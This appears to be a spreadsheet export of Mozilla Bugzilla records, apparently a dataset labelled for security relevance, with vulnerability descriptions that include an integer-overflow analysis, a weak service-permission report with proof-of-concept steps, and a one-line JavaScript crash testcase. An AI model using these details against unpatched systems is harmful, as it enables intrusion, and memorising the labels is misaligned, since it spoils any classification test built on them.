  0x0c0c8004b460: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c8004b470: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c8004b480: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8004b490: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=&gt;0x0c0c8004b4a0: 00 00 00 00 00 00 00 00 fa fa fa fa fd[fd]fd fd
  0x0c0c8004b4b0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8004b4c0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c8004b4d0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c8004b4e0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8004b4f0: fa fa fa fa 00 00 00 00 00 00 00 00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2107==ABORTING</t>
        </is>
      </c>
      <c r="X2048" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" t="n">
        <v>1002702</v>
      </c>
      <c r="B2049" t="inlineStr">
        <is>
          <t>2014-04-28 14:16:22 -0700</t>
        </is>
      </c>
      <c r="C2049" t="inlineStr">
        <is>
          <t>"Assertion failure: !mWorkerPrivate" with port.close(), GC</t>
        </is>
      </c>
      <c r="D2049" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:11 -0700</t>
        </is>
      </c>
      <c r="E2049" t="n">
        <v>1</v>
      </c>
      <c r="F2049" t="n">
        <v>1</v>
      </c>
      <c r="G2049" t="n">
        <v>3</v>
      </c>
      <c r="H2049" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2049" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2049" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2049" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2049" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2049" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2049" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2049" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q2049" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2049" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2049" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T2049" t="n">
        <v>1</v>
      </c>
      <c r="U2049" t="n">
        <v>0</v>
      </c>
      <c r="V2049" t="n">
        <v>21</v>
      </c>
      <c r="W2049" t="inlineStr">
        <is>
          <t>Created attachment 8413991
testcase
1. Load the testcase
2. Use about:memory to force a GC
OR 
1. Install https://www.squarefree.com/extensions/domFuzzLite3.xpi
2. Load the testcase
Assertion failure: !mWorkerPrivate, at dom/workers/SharedWorker.cpp:43
Security-sensitive because (1) it's similar to bug 998474 and (2) it involves GC.</t>
        </is>
      </c>
      <c r="X2049" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" t="n">
        <v>263546</v>
      </c>
      <c r="B2050" t="inlineStr">
        <is>
          <t>2004-10-08 15:24:45 -0700</t>
        </is>
      </c>
      <c r="C2050" t="inlineStr">
        <is>
          <t>Security risk: TB uses IE to open javascript pop-up in news-feed items</t>
        </is>
      </c>
      <c r="D2050" t="inlineStr">
        <is>
          <t>2005-01-06 11:04:54 -0800</t>
        </is>
      </c>
      <c r="E2050" t="n">
        <v>1</v>
      </c>
      <c r="F2050" t="n">
        <v>1</v>
      </c>
      <c r="G2050" t="n">
        <v>2</v>
      </c>
      <c r="H2050" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2050" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J2050" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2050" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2050" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2050" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2050" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2050" t="inlineStr">
        <is>
          <t>[sg:nse]</t>
        </is>
      </c>
      <c r="Q2050" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2050" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2050" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2050" t="n">
        <v>1</v>
      </c>
      <c r="U2050" t="n">
        <v>0</v>
      </c>
      <c r="V2050" t="n">
        <v>37</v>
      </c>
      <c r="W2050" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10.1
Hello!
I have submitted a more detailed description of this issue as bug 260895 already.
But somehow, it has remained unconfirmed (and therefore I assume it has not been
looked at) since then.  I think it is a major security risk, that TB chooses to
open anything with IE, even though Firefox is the default browser.  At first
I thought this was specific to RSS feeds, but it is not.  I have taken one of
those links and placed it into an HTML e-mail.  After I receive it, it is the
same effect:  The pop-up is opened in IE.  Here is the text of the e-mail.
- - - - -
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
&lt;head&gt;
  &lt;meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"&gt;
  &lt;title&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body bgcolor="#ffffff" text="#000000"&gt;
&lt;br&gt;
Here is an HTML e-mail with a link:&lt;br&gt;
&lt;a
 href="javascript:commonPopup('printerFriendlyPopup.jhtml?type=scienceNews&amp;storyID=6456643',
540, 525, 1, 'printerPopup')"&gt;Test&lt;/a&gt;&lt;br&gt;
- - - - -
Note that the Reuters page, from which I originally took this link, works
correctly when I open it directly in Firefox.  I can then click on the pop-up
link, and it is all displayed nicely.
But if I get this kind of link in TB, it calls IE, which is a terrible thing!
Interestingly, IE can for some reason not properly display the content, if
it is envoked that way.
Tom
Reproducible: Always
Steps to Reproduce:
Please see bug 260895, or send yourself an HTML e-mail with the above
specified text.
Actual Results:  
IE is used to open the pop-up, when it really should be Firefox.
Expected Results:  
Open pop-up with FIrefox.</t>
        </is>
      </c>
      <c r="X2050" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" t="n">
        <v>1170794</v>
      </c>
      <c r="B2051" t="inlineStr">
        <is>
          <t>2015-06-02 15:09:27 -0700</t>
        </is>
      </c>
      <c r="C2051" t="inlineStr">
        <is>
          <t>Overflow in nsUnicodeToUTF8::GetMaxLength can create memory-safety bugs in callers</t>
        </is>
      </c>
      <c r="D2051" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:52 -0700</t>
        </is>
      </c>
      <c r="E2051" t="n">
        <v>1</v>
      </c>
      <c r="F2051" t="n">
        <v>1</v>
      </c>
      <c r="G2051" t="n">
        <v>3</v>
      </c>
      <c r="H2051" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2051" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2051" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2051" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2051" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2051" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2051" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2051" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q2051" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2051" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2051" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2051" t="n">
        <v>1</v>
      </c>
      <c r="U2051" t="n">
        <v>0</v>
      </c>
      <c r="V2051" t="n">
        <v>20</v>
      </c>
      <c r="W2051" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
nsUnicodeToUTF8::GetMaxLength (38.0.1\intl\uconv\nsUnicodeToUTF8.cpp) computes the destination string length *aDestLength without checking for overflow. This means that it can return a destination string length _smaller_ than the source string length, which can then cause memory-safety bugs in its caller:
15: NS_IMETHODIMP nsUnicodeToUTF8::GetMaxLength(const char16_t * aSrc, 
16:                                              int32_t aSrcLength,
17:                                              int32_t * aDestLength)
18: {
19:   // aSrc is interpreted as UTF16, 3 is normally enough.
20:   // But when previous buffer only contains part of the surrogate pair, we 
21:   // need to complete it here. If the first word in following buffer is not
22:   // in valid surrogate range, we need to convert the remaining of last buffer
23:   // to 3 bytes.
24:   *aDestLength = 3*aSrcLength + 3;
25:   return NS_OK;
26: }
If aSrcLength &gt;= 0x2aaaaaaa, line 24 computes a negative value and returns it in *aDestLength. If the caller then uses this value without checking it, it could, for example, fail to allocate enough space for a string, causing overwriting of unowned memory. For example, EncodeString (38.0.1\netwerk\base\nsStandardURL.cpp) uses the returned value to allocate a buffer:
66: static nsresult
67: EncodeString(nsIUnicodeEncoder *encoder, const nsAFlatString &amp;str, nsACString &amp;result)
68: {
69:    nsresult rv;
70:    int32_t len = str.Length();
71:    int32_t maxlen;
72:
73:    rv = encoder-&gt;GetMaxLength(str.get(), len, &amp;maxlen);
74:    if (NS_FAILED(rv))
75:        return rv;
76:
77:    char buf[256], *p = buf;
78:    if (uint32_t(maxlen) &gt; sizeof(buf) - 1) {
79:        p = (char *) malloc(maxlen + 1);
80:        if (!p)
81:            return NS_ERROR_OUT_OF_MEMORY;
82:    }
83:
84:    rv = encoder-&gt;Convert(str.get(), &amp;len, p, &amp;maxlen);
85:    if (NS_FAILED(rv))
86:        goto end;
87:    ...
92:    p[maxlen] = 0;
93:    result.Assign(p);
94:
95:    len = sizeof(buf) - 1;
96:    rv = encoder-&gt;Finish(buf, &amp;len);
97:    if (NS_FAILED(rv))
98:        goto end;
99:    buf[len] = 0;    ...
If str.Length() == 0x55555554 and encoder isa nsUnicodeToUTF8, then nsUnicodeToUTF8::GetMaxLength will compute maxlen == 0xffffffff (== -1), and line 79 will compute and allocate a buffer of size -1+1 == 0. Line 84 won't cause a problem because of how nsUnicodeToUTF8::Convert is implemented, but line 92 will zero the byte at p-1.
This write will cause unpredictable effects, possibly including disclosure of sensitive information.</t>
        </is>
      </c>
      <c r="X2051" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" t="n">
        <v>95113</v>
      </c>
      <c r="B2052" t="inlineStr">
        <is>
          <t>2001-08-13 11:29:36 -0700</t>
        </is>
      </c>
      <c r="C2052" t="inlineStr">
        <is>
          <t>Send mail feature in simple MAPI</t>
        </is>
      </c>
      <c r="D2052" t="inlineStr">
        <is>
          <t>2008-07-31 01:25:05 -0700</t>
        </is>
      </c>
      <c r="E2052" t="n">
        <v>1</v>
      </c>
      <c r="F2052" t="n">
        <v>1</v>
      </c>
      <c r="G2052" t="n">
        <v>3</v>
      </c>
      <c r="H2052" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2052" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2052" t="inlineStr">
        <is>
          <t>Simple MAPI</t>
        </is>
      </c>
      <c r="K2052" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2052" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2052" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2052" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2052" t="inlineStr">
        <is>
          <t>[PDT+] [Fix on 094 branch]</t>
        </is>
      </c>
      <c r="Q2052" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2052" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2052" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2052" t="n">
        <v>1</v>
      </c>
      <c r="U2052" t="n">
        <v>0</v>
      </c>
      <c r="V2052" t="n">
        <v>46</v>
      </c>
      <c r="W2052" t="inlineStr">
        <is>
          <t>This is to track the implementation of the send mail feature in simple MAPI.</t>
        </is>
      </c>
      <c r="X2052" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" t="n">
        <v>1472204</v>
      </c>
      <c r="B2053" t="inlineStr">
        <is>
          <t>2018-06-29 07:41:07 -0700</t>
        </is>
      </c>
      <c r="C2053" t="inlineStr">
        <is>
          <t>Inspect machine URL is broken</t>
        </is>
      </c>
      <c r="D2053" t="inlineStr">
        <is>
          <t>2018-06-29 13:28:41 -0700</t>
        </is>
      </c>
      <c r="E2053" t="n">
        <v>1</v>
      </c>
      <c r="F2053" t="n">
        <v>1</v>
      </c>
      <c r="G2053" t="n">
        <v>7</v>
      </c>
      <c r="H2053" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2053" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2053" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K2053" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2053" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2053" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2053" t="inlineStr"/>
      <c r="Q2053" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2053" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2053" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2053" t="n">
        <v>1</v>
      </c>
      <c r="U2053" t="n">
        <v>0</v>
      </c>
      <c r="V2053" t="n">
        <v>9</v>
      </c>
      <c r="W2053" t="inlineStr">
        <is>
          <t>Created attachment 8988739
treeherder_machine_link.PNG
The link under the machine id is treeherder.
Attaching screenshot.</t>
        </is>
      </c>
      <c r="X2053" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" t="n">
        <v>1430859</v>
      </c>
      <c r="B2054" t="inlineStr">
        <is>
          <t>2018-01-16 10:51:12 -0800</t>
        </is>
      </c>
      <c r="C2054" t="inlineStr">
        <is>
          <t>Implement persistence for isEnabled/isCollapsed for sections that works with webextension sections</t>
        </is>
      </c>
      <c r="D2054" t="inlineStr">
        <is>
          <t>2021-11-29 02:39:59 -0800</t>
        </is>
      </c>
      <c r="E2054" t="n">
        <v>1</v>
      </c>
      <c r="F2054" t="n">
        <v>1</v>
      </c>
      <c r="G2054" t="n">
        <v>2</v>
      </c>
      <c r="H2054" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2054" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2054" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K2054" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2054" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2054" t="inlineStr"/>
      <c r="Q2054" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2054" t="inlineStr">
        <is>
          <t>Firefox 62</t>
        </is>
      </c>
      <c r="T2054" t="n">
        <v>1</v>
      </c>
      <c r="U2054" t="n">
        <v>0</v>
      </c>
      <c r="V2054" t="n">
        <v>4</v>
      </c>
      <c r="W2054" t="inlineStr">
        <is>
          <t>Right now, persistent storage for the isEnabled/isCollapsed state of our sections is implemented with a combination of of different prefs for each section. While this works OK for built-in sections, it's not a scalable solution for supporting Web Extension sections (being implemented in Bug 1401194).
We could implement persistence here with either using a single pref to store confguration, or preferably, with IndexedDB via IndexedDB.jsm.</t>
        </is>
      </c>
      <c r="X2054" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" t="n">
        <v>1015540</v>
      </c>
      <c r="B2055" t="inlineStr">
        <is>
          <t>2014-05-23 19:38:07 -0700</t>
        </is>
      </c>
      <c r="C2055" t="inlineStr">
        <is>
          <t>Alarms API performs unsafe toJSON conversions on content objects</t>
        </is>
      </c>
      <c r="D2055" t="inlineStr">
        <is>
          <t>2016-02-16 16:14:40 -0800</t>
        </is>
      </c>
      <c r="E2055" t="n">
        <v>1</v>
      </c>
      <c r="F2055" t="n">
        <v>1</v>
      </c>
      <c r="G2055" t="n">
        <v>3</v>
      </c>
      <c r="H2055" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2055" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2055" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K2055" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2055" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2055" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2055" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2055" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+]</t>
        </is>
      </c>
      <c r="Q2055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2055" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2055" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T2055" t="n">
        <v>1</v>
      </c>
      <c r="U2055" t="n">
        <v>0</v>
      </c>
      <c r="V2055" t="n">
        <v>45</v>
      </c>
      <c r="W2055" t="inlineStr">
        <is>
          <t>The "data" argument of AlarmsManager.add() is converted to a string using toJSON, which will run with chrome privileges and hence be able to grab the .href even from cross-origin location objects (esp once we convert Location to WebIDL).  Then we expose that data back to the page via getAll(), as far as I can tell.</t>
        </is>
      </c>
      <c r="X2055" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" t="n">
        <v>13463</v>
      </c>
      <c r="B2056" t="inlineStr">
        <is>
          <t>1999-09-09 12:30:28 -0700</t>
        </is>
      </c>
      <c r="C2056" t="inlineStr">
        <is>
          <t>[BLOCK] event state manager can't tell when frames it tracks go away</t>
        </is>
      </c>
      <c r="D2056" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E2056" t="n">
        <v>1</v>
      </c>
      <c r="F2056" t="n">
        <v>1</v>
      </c>
      <c r="G2056" t="n">
        <v>3</v>
      </c>
      <c r="H2056" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2056" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2056" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K2056" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2056" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2056" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q2056" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2056" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2056" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T2056" t="n">
        <v>1</v>
      </c>
      <c r="U2056" t="n">
        <v>0</v>
      </c>
      <c r="V2056" t="n">
        <v>13</v>
      </c>
      <c r="W2056" t="inlineStr">
        <is>
          <t>In the event state manager, there are several frames that are being held onto for
tracking mouse enter/leave and drag gesture things. However, the psuedo-event
generation is two-staged:
- tell the DOM
- tell the frame
If a listener in the dom (such as a drop listener) deletes the frame (user moved
a button on the toolbar, causing it to be deleted), then when control gets back
to the event state manager, the frame is dangling and we crash hard.
Hyatt also will have this problem with closing up xp-popups.</t>
        </is>
      </c>
      <c r="X2056" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" t="n">
        <v>1690062</v>
      </c>
      <c r="B2057" t="inlineStr">
        <is>
          <t>2021-02-01 10:37:54 -0800</t>
        </is>
      </c>
      <c r="C2057" t="inlineStr">
        <is>
          <t>Windows Maintenance Service has a Weak DACL for Domain Networks</t>
        </is>
      </c>
      <c r="D2057" t="inlineStr">
        <is>
          <t>2021-11-29 20:28:48 -0800</t>
        </is>
      </c>
      <c r="E2057" t="n">
        <v>1</v>
      </c>
      <c r="F2057" t="n">
        <v>1</v>
      </c>
      <c r="G2057" t="n">
        <v>3</v>
      </c>
      <c r="H2057" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2057" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2057" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2057" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2057" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M2057" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2057" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2057" t="inlineStr">
        <is>
          <t>[Disclosure deadline 2021-05-03] Could lead to system RCE if combined with other bugs</t>
        </is>
      </c>
      <c r="Q2057" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2057" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2057" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T2057" t="n">
        <v>1</v>
      </c>
      <c r="U2057" t="n">
        <v>0</v>
      </c>
      <c r="V2057" t="n">
        <v>28</v>
      </c>
      <c r="W2057" t="inlineStr">
        <is>
          <t>Created attachment 9200493
poc.cpp
## Summary: 
The Mozilla Maintenance service on Windows is configured to allow *BUILTIN\Users* *SERVICE_START* access which can be granted to normal remote users on domain networks allowing them to start the service remotely and pass arbitrary arguments to its service main.
## Description:
Note, it’s not clear how much you care about this behavior, and perhaps it’s intentional? Up to you whether you fix it I guess, however I would highly recommend it.
In domain environments (less so in home networks) most users can authenticate to any other workstation or server. One commonly remotely exposed service is the Service Control Manager which manages the local services. A non-administrator can be granted access to a service as long as they can pass a series of access checks.
Basically when installing the maintenance service’s security descriptor in [serviceinstall.cpp](https://searchfox.org/mozilla-central/source/toolkit/components/maintenanceservice/serviceinstall.cpp#691) you grant *BUILTIN\Users* group *SERVICE_START* and *SERVICE_STOP* access. As this group is granted to all authenticated users including remote ones this means any remote user can start and stop the maintenance service. This is a risk as the start operation takes a command line which is used to influence the update operation, and has been a source of numerous bugs in the past. While there might not be any known bugs in the handling of arguments atm, is this something you want to risk? If such a bug was found then you could have SYSTEM RCE on domain networks.
Now, this isn’t quite as bad as it might be. For a start I’m guessing some enterprises don’t install the service and rely on their own installation mechanisms and this assumes the service is exposed remotely through the firewall on a host. Also since Windows 10 1709 a mitigation has been in place to prevent remote users not in the local admin group from getting access to certain SCM and service access rights. This is described in a [support article](https://support.microsoft.com/en-us/topic/block-remote-callers-who-are-not-local-administrators-from-starting-stopping-services-c5f77f8e-09e6-57e6-72d1-2c4423627a24). This blocks a normal user getting *SERVICE_START* access but this hasn’t been back ported to Windows 7 or 8.X which you still support so they would be vulnerable, and it's possible to disable the mitigation which some sysadmins might do.
My recommended fix is to use the *NT AUTHORITY\INTERACTIVE* group instead of the *BUILTIN\Users*. This group is only granted to interactive logins (which includes RDP logins), not network logins, which is presumably the behavior you want? Replacing the line in serviceinstall.cpp `CreateWellKnownSid(WinBuiltinUsersSid, nullptr, sid, &amp;SIDSize)` with `CreateWellKnownSid(WinInteractiveSid, nullptr, sid, &amp;SIDSize)` should be sufficient.
## Proof of Concept:
I’ve provided a proof of concept as a C++ file which will access the local SCM over a TCP RPC connection which simulates remote access. It also disables the *INTERACTIVE* group from the caller’s token to ensure it’s not inadvertently getting access using that, this is needed as it’ll actually use the same token and not do a full network authentication but the same result has been tested remotely. You’ll need to put the C++ file into a project and compile it.
For reasons already outlined you’ll need to run this on Windows 7 or 8.1 as recent versions of Windows 10 have a mitigation to block this attack vector. Although if you want to test on Windows 10 read the previous link for the registry key settings to disable the mitigation.
1) Compile the C++ project.
2) Run the POC on Windows 7 or 8.1 with the maintenance service installed.
3) Observe the output, if it prints *[SUCCESS]* it should have been granted *SERVICE_START* access.
### Expected Result:
The *OpenService* call fails with *ERROR_ACCESS_DENIED*.
### Observed Result:
The *OpenService* call succeeds.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2021-05-03. Disclosure at an earlier date is also possible if
agreed upon by all parties.</t>
        </is>
      </c>
      <c r="X2057" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" t="n">
        <v>431409</v>
      </c>
      <c r="B2058" t="inlineStr">
        <is>
          <t>2008-04-29 14:36:30 -0700</t>
        </is>
      </c>
      <c r="C2058" t="inlineStr">
        <is>
          <t>[1.8 branch] Crash [@ js_AtomToPrintableString]</t>
        </is>
      </c>
      <c r="D2058" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2058" t="n">
        <v>1</v>
      </c>
      <c r="F2058" t="n">
        <v>1</v>
      </c>
      <c r="G2058" t="n">
        <v>3</v>
      </c>
      <c r="H2058" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2058" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2058" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2058" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2058" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2058" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2058" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2058" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2058" t="inlineStr">
        <is>
          <t>[sg:dupe 371292] verify testcase</t>
        </is>
      </c>
      <c r="Q2058" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2058" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2058" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2058" t="n">
        <v>1</v>
      </c>
      <c r="U2058" t="n">
        <v>0</v>
      </c>
      <c r="V2058" t="n">
        <v>7</v>
      </c>
      <c r="W2058" t="inlineStr">
        <is>
          <t>Created attachment 318482
stacktrace
I found this bug and reduced it. Jesse Ruderman helped to reduce it even more, till:
"012345".__defineSetter__(5, function(){});
This command crashes at js_AtomToPrintableString with address 0x0000000000000013. It does not crash trunk js shell.</t>
        </is>
      </c>
      <c r="X2058" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" t="n">
        <v>785522</v>
      </c>
      <c r="B2059" t="inlineStr">
        <is>
          <t>2012-08-24 14:56:13 -0700</t>
        </is>
      </c>
      <c r="C2059" t="inlineStr">
        <is>
